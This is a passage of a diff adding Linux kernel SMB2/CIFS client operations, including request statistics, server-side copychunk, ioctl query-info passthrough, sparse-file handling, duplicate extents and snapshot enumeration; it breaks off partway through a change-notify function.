++		   atomic_read(&sent[SMB2_TREE_DISCONNECT_HE]),
++		   atomic_read(&failed[SMB2_TREE_DISCONNECT_HE]));
++	seq_printf(m, "\nCreates: %d total %d failed",
++		   atomic_read(&sent[SMB2_CREATE_HE]),
++		   atomic_read(&failed[SMB2_CREATE_HE]));
++	seq_printf(m, "\nCloses: %d total %d failed",
++		   atomic_read(&sent[SMB2_CLOSE_HE]),
++		   atomic_read(&failed[SMB2_CLOSE_HE]));
++	seq_printf(m, "\nFlushes: %d total %d failed",
++		   atomic_read(&sent[SMB2_FLUSH_HE]),
++		   atomic_read(&failed[SMB2_FLUSH_HE]));
++	seq_printf(m, "\nReads: %d total %d failed",
++		   atomic_read(&sent[SMB2_READ_HE]),
++		   atomic_read(&failed[SMB2_READ_HE]));
++	seq_printf(m, "\nWrites: %d total %d failed",
++		   atomic_read(&sent[SMB2_WRITE_HE]),
++		   atomic_read(&failed[SMB2_WRITE_HE]));
++	seq_printf(m, "\nLocks: %d total %d failed",
++		   atomic_read(&sent[SMB2_LOCK_HE]),
++		   atomic_read(&failed[SMB2_LOCK_HE]));
++	seq_printf(m, "\nIOCTLs: %d total %d failed",
++		   atomic_read(&sent[SMB2_IOCTL_HE]),
++		   atomic_read(&failed[SMB2_IOCTL_HE]));
++	seq_printf(m, "\nQueryDirectories: %d total %d failed",
++		   atomic_read(&sent[SMB2_QUERY_DIRECTORY_HE]),
++		   atomic_read(&failed[SMB2_QUERY_DIRECTORY_HE]));
++	seq_printf(m, "\nChangeNotifies: %d total %d failed",
++		   atomic_read(&sent[SMB2_CHANGE_NOTIFY_HE]),
++		   atomic_read(&failed[SMB2_CHANGE_NOTIFY_HE]));
++	seq_printf(m, "\nQueryInfos: %d total %d failed",
++		   atomic_read(&sent[SMB2_QUERY_INFO_HE]),
++		   atomic_read(&failed[SMB2_QUERY_INFO_HE]));
++	seq_printf(m, "\nSetInfos: %d total %d failed",
++		   atomic_read(&sent[SMB2_SET_INFO_HE]),
++		   atomic_read(&failed[SMB2_SET_INFO_HE]));
++	seq_printf(m, "\nOplockBreaks: %d sent %d failed",
++		   atomic_read(&sent[SMB2_OPLOCK_BREAK_HE]),
++		   atomic_read(&failed[SMB2_OPLOCK_BREAK_HE]));
++}
++
++static void
++smb2_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++
++	cfile->fid.persistent_fid = fid->persistent_fid;
++	cfile->fid.volatile_fid = fid->volatile_fid;
++	cfile->fid.access = fid->access;
++#ifdef CONFIG_CIFS_DEBUG2
++	cfile->fid.mid = fid->mid;
++#endif /* CIFS_DEBUG2 */
++	server->ops->set_oplock_level(cinode, oplock, fid->epoch,
++				      &fid->purge_cache);
++	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
++	memcpy(cfile->fid.create_guid, fid->create_guid, 16);
++}
++
++static void
++smb2_close_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++static void
++smb2_close_getattr(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	struct smb2_file_network_open_info file_inf;
++	struct inode *inode;
++	int rc;
++
++	rc = __SMB2_close(xid, tcon, cfile->fid.persistent_fid,
++		   cfile->fid.volatile_fid, &file_inf);
++	if (rc)
++		return;
++
++	inode = d_inode(cfile->dentry);
++
++	spin_lock(&inode->i_lock);
++	CIFS_I(inode)->time = jiffies;
++
++	/* Creation time should not need to be updated on close */
++	if (file_inf.LastWriteTime)
++		inode->i_mtime = cifs_NTtimeToUnix(file_inf.LastWriteTime);
++	if (file_inf.ChangeTime)
++		inode->i_ctime = cifs_NTtimeToUnix(file_inf.ChangeTime);
++	if (file_inf.LastAccessTime)
++		inode->i_atime = cifs_NTtimeToUnix(file_inf.LastAccessTime);
++
++	/*
++	 * i_blocks is not related to (i_size / i_blksize),
++	 * but instead 512 byte (2**9) size is required for
++	 * calculating num blocks.
++	 */
++	if (le64_to_cpu(file_inf.AllocationSize) > 4096)
++		inode->i_blocks =
++			(512 - 1 + le64_to_cpu(file_inf.AllocationSize)) >> 9;
++
++	/* End of file and Attributes should not have to be updated on close */
++	spin_unlock(&inode->i_lock);
++}
++
++static int
++SMB2_request_res_key(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid,
++		     struct copychunk_ioctl *pcchunk)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct resume_key_req *res_key;
++
++	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
++			FSCTL_SRV_REQUEST_RESUME_KEY, NULL, 0 /* no input */,
++			CIFSMaxBufSize, (char **)&res_key, &ret_data_len);
++
++	if (rc == -EOPNOTSUPP) {
++		pr_warn_once("Server share %s does not support copy range\n", tcon->tree_name);
++		goto req_res_key_exit;
++	} else if (rc) {
++		cifs_tcon_dbg(VFS, "refcpy ioctl error %d getting resume key\n", rc);
++		goto req_res_key_exit;
++	}
++	if (ret_data_len < sizeof(struct resume_key_req)) {
++		cifs_tcon_dbg(VFS, "Invalid refcopy resume key length\n");
++		rc = -EINVAL;
++		goto req_res_key_exit;
++	}
++	memcpy(pcchunk->SourceKey, res_key->ResumeKey, COPY_CHUNK_RES_KEY_SIZE);
++
++req_res_key_exit:
++	kfree(res_key);
++	return rc;
++}
++
++struct iqi_vars {
++	struct smb_rqst rqst[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	struct kvec close_iov[1];
++};
++
++static int
++smb2_ioctl_query_info(const unsigned int xid,
++		      struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb,
++		      __le16 *path, int is_dir,
++		      unsigned long p)
++{
++	struct iqi_vars *vars;
++	struct smb_rqst *rqst;
++	struct kvec *rsp_iov;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	char __user *arg = (char __user *)p;
++	struct smb_query_info qi;
++	struct smb_query_info __user *pqi;
++	int rc = 0;
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	struct smb2_ioctl_rsp *io_rsp = NULL;
++	void *buffer = NULL;
++	int resp_buftype[3];
++	struct cifs_open_parms oparms;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	unsigned int size[2];
++	void *data[2];
++	int create_options = is_dir ? CREATE_NOT_FILE : CREATE_NOT_DIR;
++	void (*free_req1_func)(struct smb_rqst *r);
++
++	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
++	if (vars == NULL)
++		return -ENOMEM;
++	rqst = &vars->rqst[0];
++	rsp_iov = &vars->rsp_iov[0];
++
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++
++	if (copy_from_user(&qi, arg, sizeof(struct smb_query_info))) {
++		rc = -EFAULT;
++		goto free_vars;
++	}
++	if (qi.output_buffer_length > 1024) {
++		rc = -EINVAL;
++		goto free_vars;
++	}
++
++	if (!ses || !server) {
++		rc = -EIO;
++		goto free_vars;
++	}
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	if (qi.output_buffer_length) {
++		buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length);
++		if (IS_ERR(buffer)) {
++			rc = PTR_ERR(buffer);
++			goto free_vars;
++		}
++	}
++
++	/* Open */
++	rqst[0].rq_iov = &vars->open_iov[0];
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
++
++	if (qi.flags & PASSTHRU_FSCTL) {
++		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
++		case FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS:
++			oparms.desired_access = FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | SYNCHRONIZE;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS:
++			oparms.desired_access = GENERIC_ALL;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS:
++			oparms.desired_access = GENERIC_READ;
++			break;
++		case FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS:
++			oparms.desired_access = GENERIC_WRITE;
++			break;
++		}
++	} else if (qi.flags & PASSTHRU_SET_INFO) {
++		oparms.desired_access = GENERIC_WRITE;
++	} else {
++		oparms.desired_access = FILE_READ_ATTRIBUTES | READ_CONTROL;
++	}
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, path);
++	if (rc)
++		goto free_output_buffer;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	/* Query */
++	if (qi.flags & PASSTHRU_FSCTL) {
++		/* Can eventually relax perm check since server enforces too */
++		if (!capable(CAP_SYS_ADMIN)) {
++			rc = -EPERM;
++			goto free_open_req;
++		}
++		rqst[1].rq_iov = &vars->io_iov[0];
++		rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++		rc = SMB2_ioctl_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
++				     qi.info_type, buffer, qi.output_buffer_length,
++				     CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++				     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++		free_req1_func = SMB2_ioctl_free;
++	} else if (qi.flags == PASSTHRU_SET_INFO) {
++		/* Can eventually relax perm check since server enforces too */
++		if (!capable(CAP_SYS_ADMIN)) {
++			rc = -EPERM;
++			goto free_open_req;
++		}
++		if (qi.output_buffer_length < 8) {
++			rc = -EINVAL;
++			goto free_open_req;
++		}
++		rqst[1].rq_iov = &vars->si_iov[0];
++		rqst[1].rq_nvec = 1;
++
++		/* MS-FSCC 2.4.13 FileEndOfFileInformation */
++		size[0] = 8;
++		data[0] = buffer;
++
++		rc = SMB2_set_info_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
++					current->tgid, FILE_END_OF_FILE_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		free_req1_func = SMB2_set_info_free;
++	} else if (qi.flags == PASSTHRU_QUERY_INFO) {
++		rqst[1].rq_iov = &vars->qi_iov[0];
++		rqst[1].rq_nvec = 1;
++
++		rc = SMB2_query_info_init(tcon, server,
++				  &rqst[1], COMPOUND_FID,
++				  COMPOUND_FID, qi.file_info_class,
++				  qi.info_type, qi.additional_information,
++				  qi.input_buffer_length,
++				  qi.output_buffer_length, buffer);
++		free_req1_func = SMB2_query_info_free;
++	} else { /* unknown flags */
++		cifs_tcon_dbg(VFS, "Invalid passthru query flags: 0x%x\n",
++			      qi.flags);
++		rc = -EINVAL;
++	}
++
++	if (rc)
++		goto free_open_req;
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++	/* Close */
++	rqst[2].rq_iov = &vars->close_iov[0];
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto free_req_1;
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++	if (rc)
++		goto out;
++
++	/* No need to bump num_remote_opens since handle immediately closed */
++	if (qi.flags & PASSTHRU_FSCTL) {
++		pqi = (struct smb_query_info __user *)arg;
++		io_rsp = (struct smb2_ioctl_rsp *)rsp_iov[1].iov_base;
++		if (le32_to_cpu(io_rsp->OutputCount) < qi.input_buffer_length)
++			qi.input_buffer_length = le32_to_cpu(io_rsp->OutputCount);
++		if (qi.input_buffer_length > 0 &&
++		    le32_to_cpu(io_rsp->OutputOffset) + qi.input_buffer_length
++		    > rsp_iov[1].iov_len) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user(&pqi->input_buffer_length,
++				 &qi.input_buffer_length,
++				 sizeof(qi.input_buffer_length))) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user((void __user *)pqi + sizeof(struct smb_query_info),
++				 (const void *)io_rsp + le32_to_cpu(io_rsp->OutputOffset),
++				 qi.input_buffer_length))
++			rc = -EFAULT;
++	} else {
++		pqi = (struct smb_query_info __user *)arg;
++		qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++		if (le32_to_cpu(qi_rsp->OutputBufferLength) < qi.input_buffer_length)
++			qi.input_buffer_length = le32_to_cpu(qi_rsp->OutputBufferLength);
++		if (copy_to_user(&pqi->input_buffer_length,
++				 &qi.input_buffer_length,
++				 sizeof(qi.input_buffer_length))) {
++			rc = -EFAULT;
++			goto out;
++		}
++
++		if (copy_to_user(pqi + 1, qi_rsp->Buffer,
++				 qi.input_buffer_length))
++			rc = -EFAULT;
++	}
++
++out:
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	SMB2_close_free(&rqst[2]);
++free_req_1:
++	free_req1_func(&rqst[1]);
++free_open_req:
++	SMB2_open_free(&rqst[0]);
++free_output_buffer:
++	kfree(buffer);
++free_vars:
++	kfree(vars);
++	return rc;
++}
++
++static ssize_t
++smb2_copychunk_range(const unsigned int xid,
++			struct cifsFileInfo *srcfile,
++			struct cifsFileInfo *trgtfile, u64 src_off,
++			u64 len, u64 dest_off)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct copychunk_ioctl *pcchunk;
++	struct copychunk_ioctl_rsp *retbuf = NULL;
++	struct cifs_tcon *tcon;
++	int chunks_copied = 0;
++	bool chunk_sizes_updated = false;
++	ssize_t bytes_written, total_bytes_written = 0;
++
++	pcchunk = kmalloc(sizeof(struct copychunk_ioctl), GFP_KERNEL);
++	if (pcchunk == NULL)
++		return -ENOMEM;
++
++	cifs_dbg(FYI, "%s: about to call request res key\n", __func__);
++	/* Request a key from the server to identify the source of the copy */
++	rc = SMB2_request_res_key(xid, tlink_tcon(srcfile->tlink),
++				srcfile->fid.persistent_fid,
++				srcfile->fid.volatile_fid, pcchunk);
++
++	/* Note: request_res_key sets res_key null only if rc !=0 */
++	if (rc)
++		goto cchunk_out;
++
++	/* For now array only one chunk long, will make more flexible later */
++	pcchunk->ChunkCount = cpu_to_le32(1);
++	pcchunk->Reserved = 0;
++	pcchunk->Reserved2 = 0;
++
++	tcon = tlink_tcon(trgtfile->tlink);
++
++	while (len > 0) {
++		pcchunk->SourceOffset = cpu_to_le64(src_off);
++		pcchunk->TargetOffset = cpu_to_le64(dest_off);
++		pcchunk->Length =
++			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
++
++		/* Request server copy to target from src identified by key */
++		kfree(retbuf);
++		retbuf = NULL;
++		rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
++			trgtfile->fid.volatile_fid, FSCTL_SRV_COPYCHUNK_WRITE,
++			(char *)pcchunk, sizeof(struct copychunk_ioctl),
++			CIFSMaxBufSize, (char **)&retbuf, &ret_data_len);
++		if (rc == 0) {
++			if (ret_data_len !=
++					sizeof(struct copychunk_ioctl_rsp)) {
++				cifs_tcon_dbg(VFS, "Invalid cchunk response size\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			if (retbuf->TotalBytesWritten == 0) {
++				cifs_dbg(FYI, "no bytes copied\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			/*
++			 * Check if server claimed to write more than we asked
++			 */
++			if (le32_to_cpu(retbuf->TotalBytesWritten) >
++			    le32_to_cpu(pcchunk->Length)) {
++				cifs_tcon_dbg(VFS, "Invalid copy chunk response\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			if (le32_to_cpu(retbuf->ChunksWritten) != 1) {
++				cifs_tcon_dbg(VFS, "Invalid num chunks written\n");
++				rc = -EIO;
++				goto cchunk_out;
++			}
++			chunks_copied++;
++
++			bytes_written = le32_to_cpu(retbuf->TotalBytesWritten);
++			src_off += bytes_written;
++			dest_off += bytes_written;
++			len -= bytes_written;
++			total_bytes_written += bytes_written;
++
++			cifs_dbg(FYI, "Chunks %d PartialChunk %d Total %zu\n",
++				le32_to_cpu(retbuf->ChunksWritten),
++				le32_to_cpu(retbuf->ChunkBytesWritten),
++				bytes_written);
++		} else if (rc == -EINVAL) {
++			if (ret_data_len != sizeof(struct copychunk_ioctl_rsp))
++				goto cchunk_out;
++
++			cifs_dbg(FYI, "MaxChunks %d BytesChunk %d MaxCopy %d\n",
++				le32_to_cpu(retbuf->ChunksWritten),
++				le32_to_cpu(retbuf->ChunkBytesWritten),
++				le32_to_cpu(retbuf->TotalBytesWritten));
++
++			/*
++			 * Check if this is the first request using these sizes,
++			 * (ie check if copy succeed once with original sizes
++			 * and check if the server gave us different sizes after
++			 * we already updated max sizes on previous request).
++			 * if not then why is the server returning an error now
++			 */
++			if ((chunks_copied != 0) || chunk_sizes_updated)
++				goto cchunk_out;
++
++			/* Check that server is not asking us to grow size */
++			if (le32_to_cpu(retbuf->ChunkBytesWritten) <
++					tcon->max_bytes_chunk)
++				tcon->max_bytes_chunk =
++					le32_to_cpu(retbuf->ChunkBytesWritten);
++			else
++				goto cchunk_out; /* server gave us bogus size */
++
++			/* No need to change MaxChunks since already set to 1 */
++			chunk_sizes_updated = true;
++		} else
++			goto cchunk_out;
++	}
++
++cchunk_out:
++	kfree(pcchunk);
++	kfree(retbuf);
++	if (rc)
++		return rc;
++	else
++		return total_bytes_written;
++}
++
++static int
++smb2_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	return SMB2_flush(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++static unsigned int
++smb2_read_data_offset(char *buf)
++{
++	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
++
++	return rsp->DataOffset;
++}
++
++static unsigned int
++smb2_read_data_length(char *buf, bool in_remaining)
++{
++	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
++
++	if (in_remaining)
++		return le32_to_cpu(rsp->DataRemaining);
++
++	return le32_to_cpu(rsp->DataLength);
++}
++
++
++static int
++smb2_sync_read(const unsigned int xid, struct cifs_fid *pfid,
++	       struct cifs_io_parms *parms, unsigned int *bytes_read,
++	       char **buf, int *buf_type)
++{
++	parms->persistent_fid = pfid->persistent_fid;
++	parms->volatile_fid = pfid->volatile_fid;
++	return SMB2_read(xid, parms, bytes_read, buf, buf_type);
++}
++
++static int
++smb2_sync_write(const unsigned int xid, struct cifs_fid *pfid,
++		struct cifs_io_parms *parms, unsigned int *written,
++		struct kvec *iov, unsigned long nr_segs)
++{
++
++	parms->persistent_fid = pfid->persistent_fid;
++	parms->volatile_fid = pfid->volatile_fid;
++	return SMB2_write(xid, parms, written, iov, nr_segs);
++}
++
++/* Set or clear the SPARSE_FILE attribute based on value passed in setsparse */
++static bool smb2_set_sparse(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifsFileInfo *cfile, struct inode *inode, __u8 setsparse)
++{
++	struct cifsInodeInfo *cifsi;
++	int rc;
++
++	cifsi = CIFS_I(inode);
++
++	/* if file already sparse don't bother setting sparse again */
++	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && setsparse)
++		return true; /* already sparse */
++
++	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && !setsparse)
++		return true; /* already not sparse */
++
++	/*
++	 * Can't check for sparse support on share the usual way via the
++	 * FS attribute info (FILE_SUPPORTS_SPARSE_FILES) on the share
++	 * since Samba server doesn't set the flag on the share, yet
++	 * supports the set sparse FSCTL and returns sparse correctly
++	 * in the file attributes. If we fail setting sparse though we
++	 * mark that server does not support sparse files for this share
++	 * to avoid repeatedly sending the unsupported fsctl to server
++	 * if the file is repeatedly extended.
++	 */
++	if (tcon->broken_sparse_sup)
++		return false;
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid, FSCTL_SET_SPARSE,
++			&setsparse, 1, CIFSMaxBufSize, NULL, NULL);
++	if (rc) {
++		tcon->broken_sparse_sup = true;
++		cifs_dbg(FYI, "set sparse rc = %d\n", rc);
++		return false;
++	}
++
++	if (setsparse)
++		cifsi->cifsAttrs |= FILE_ATTRIBUTE_SPARSE_FILE;
++	else
++		cifsi->cifsAttrs &= (~FILE_ATTRIBUTE_SPARSE_FILE);
++
++	return true;
++}
++
++static int
++smb2_set_file_size(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, __u64 size, bool set_alloc)
++{
++	__le64 eof = cpu_to_le64(size);
++	struct inode *inode;
++
++	/*
++	 * If extending file more than one page make sparse. Many Linux fs
++	 * make files sparse by default when extending via ftruncate
++	 */
++	inode = d_inode(cfile->dentry);
++
++	if (!set_alloc && (size > inode->i_size + 8192)) {
++		__u8 set_sparse = 1;
++
++		/* whether set sparse succeeds or not, extend the file */
++		smb2_set_sparse(xid, tcon, cfile, inode, set_sparse);
++	}
++
++	return SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++			    cfile->fid.volatile_fid, cfile->pid, &eof);
++}
++
++static int
++smb2_duplicate_extents(const unsigned int xid,
++			struct cifsFileInfo *srcfile,
++			struct cifsFileInfo *trgtfile, u64 src_off,
++			u64 len, u64 dest_off)
++{
++	int rc;
++	unsigned int ret_data_len;
++	struct inode *inode;
++	struct duplicate_extents_to_file dup_ext_buf;
++	struct cifs_tcon *tcon = tlink_tcon(trgtfile->tlink);
++
++	/* server fileays advertise duplicate extent support with this flag */
++	if ((le32_to_cpu(tcon->fsAttrInfo.Attributes) &
++	     FILE_SUPPORTS_BLOCK_REFCOUNTING) == 0)
++		return -EOPNOTSUPP;
++
++	dup_ext_buf.VolatileFileHandle = srcfile->fid.volatile_fid;
++	dup_ext_buf.PersistentFileHandle = srcfile->fid.persistent_fid;
++	dup_ext_buf.SourceFileOffset = cpu_to_le64(src_off);
++	dup_ext_buf.TargetFileOffset = cpu_to_le64(dest_off);
++	dup_ext_buf.ByteCount = cpu_to_le64(len);
++	cifs_dbg(FYI, "Duplicate extents: src off %lld dst off %lld len %lld\n",
++		src_off, dest_off, len);
++
++	inode = d_inode(trgtfile->dentry);
++	if (inode->i_size < dest_off + len) {
++		rc = smb2_set_file_size(xid, tcon, trgtfile, dest_off + len, false);
++		if (rc)
++			goto duplicate_extents_out;
++
++		/*
++		 * Although also could set plausible allocation size (i_blocks)
++		 * here in addition to setting the file size, in reflink
++		 * it is likely that the target file is sparse. Its allocation
++		 * size will be queried on next revalidate, but it is important
++		 * to make sure that file's cached size is updated immediately
++		 */
++		cifs_setsize(inode, dest_off + len);
++	}
++	rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
++			trgtfile->fid.volatile_fid,
++			FSCTL_DUPLICATE_EXTENTS_TO_FILE,
++			(char *)&dup_ext_buf,
++			sizeof(struct duplicate_extents_to_file),
++			CIFSMaxBufSize, NULL,
++			&ret_data_len);
++
++	if (ret_data_len > 0)
++		cifs_dbg(FYI, "Non-zero response length in duplicate extents\n");
++
++duplicate_extents_out:
++	return rc;
++}
++
++static int
++smb2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	return SMB2_set_compression(xid, tcon, cfile->fid.persistent_fid,
++			    cfile->fid.volatile_fid);
++}
++
++static int
++smb3_set_integrity(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	struct fsctl_set_integrity_information_req integr_info;
++	unsigned int ret_data_len;
++
++	integr_info.ChecksumAlgorithm = cpu_to_le16(CHECKSUM_TYPE_UNCHANGED);
++	integr_info.Flags = 0;
++	integr_info.Reserved = 0;
++
++	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_SET_INTEGRITY_INFORMATION,
++			(char *)&integr_info,
++			sizeof(struct fsctl_set_integrity_information_req),
++			CIFSMaxBufSize, NULL,
++			&ret_data_len);
++
++}
++
++/* GMT Token is @GMT-YYYY.MM.DD-HH.MM.SS Unicode which is 48 bytes + null */
++#define GMT_TOKEN_SIZE 50
++
++#define MIN_SNAPSHOT_ARRAY_SIZE 16 /* See MS-SMB2 section 3.3.5.15.1 */
++
++/*
++ * Input buffer contains (empty) struct smb_snapshot array with size filled in
++ * For output see struct SRV_SNAPSHOT_ARRAY in MS-SMB2 section 2.2.32.2
++ */
++static int
++smb3_enum_snapshots(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, void __user *ioc_buf)
++{
++	char *retbuf = NULL;
++	unsigned int ret_data_len = 0;
++	int rc;
++	u32 max_response_size;
++	struct smb_snapshot_array snapshot_in;
++
++	/*
++	 * On the first query to enumerate the list of snapshots available
++	 * for this volume the buffer begins with 0 (number of snapshots
++	 * which can be returned is zero since at that point we do not know
++	 * how big the buffer needs to be). On the second query,
++	 * it (ret_data_len) is set to number of snapshots so we can
++	 * know to set the maximum response size larger (see below).
++	 */
++	if (get_user(ret_data_len, (unsigned int __user *)ioc_buf))
++		return -EFAULT;
++
++	/*
++	 * Note that for snapshot queries that servers like Azure expect that
++	 * the first query be minimal size (and just used to get the number/size
++	 * of previous versions) so response size must be specified as EXACTLY
++	 * sizeof(struct snapshot_array) which is 16 when rounded up to multiple
++	 * of eight bytes.
++	 */
++	if (ret_data_len == 0)
++		max_response_size = MIN_SNAPSHOT_ARRAY_SIZE;
++	else
++		max_response_size = CIFSMaxBufSize;
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_SRV_ENUMERATE_SNAPSHOTS,
++			NULL, 0 /* no input data */, max_response_size,
++			(char **)&retbuf,
++			&ret_data_len);
++	cifs_dbg(FYI, "enum snaphots ioctl returned %d and ret buflen is %d\n",
++			rc, ret_data_len);
++	if (rc)
++		return rc;
++
++	if (ret_data_len && (ioc_buf != NULL) && (retbuf != NULL)) {
++		/* Fixup buffer */
++		if (copy_from_user(&snapshot_in, ioc_buf,
++		    sizeof(struct smb_snapshot_array))) {
++			rc = -EFAULT;
++			kfree(retbuf);
++			return rc;
++		}
++
++		/*
++		 * Check for min size, ie not large enough to fit even one GMT
++		 * token (snapshot).  On the first ioctl some users may pass in
++		 * smaller size (or zero) to simply get the size of the array
++		 * so the user space caller can allocate sufficient memory
++		 * and retry the ioctl again with larger array size sufficient
++		 * to hold all of the snapshot GMT tokens on the second try.
++		 */
++		if (snapshot_in.snapshot_array_size < GMT_TOKEN_SIZE)
++			ret_data_len = sizeof(struct smb_snapshot_array);
++
++		/*
++		 * We return struct SRV_SNAPSHOT_ARRAY, followed by
++		 * the snapshot array (of 50 byte GMT tokens) each
++		 * representing an available previous version of the data
++		 */
++		if (ret_data_len > (snapshot_in.snapshot_array_size +
++					sizeof(struct smb_snapshot_array)))
++			ret_data_len = snapshot_in.snapshot_array_size +
++					sizeof(struct smb_snapshot_array);
++
++		if (copy_to_user(ioc_buf, retbuf, ret_data_len))
++			rc = -EFAULT;
++	}
++
++	kfree(retbuf);
++	return rc;
++}
++
++
++
++static int
++smb3_notify(const unsigned int xid, struct file *pfile,
++	    void __user *ioc_buf, bool return_changes)
++{
++	struct smb3_notify_info notify;
++	struct smb3_notify_info __user *pnotify_buf;
++	struct dentry *dentry = pfile->f_path.dentry;
++	struct inode *inode = file_inode(pfile);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct cifs_tcon *tcon;
++	const unsigned char *path;
++	char *returned_ioctl_info = NULL;
++	void *page = alloc_dentry_path();
++	__le16 *utf16_path = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int rc = 0;
++	__u32 ret_len = 0;
++
++	path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(path)) {
++		rc = PTR_ERR(path);
++		goto notify_exit;
++	}
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (utf16_path == NULL) {
++		rc = -ENOMEM;
++		goto notify_exit;
++	}
++
++	if (return_changes) {
++		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify_info))) {
++			rc = -EFAULT;
++			goto notify_exit;
++		}
++	} else {
++		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify))) {
++			rc = -EFAULT;
++			goto notify_exit;
++		}
++		notify.data_len = 0;
++	}
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
++		       NULL);
++	if (rc)
++		goto notify_exit;
++
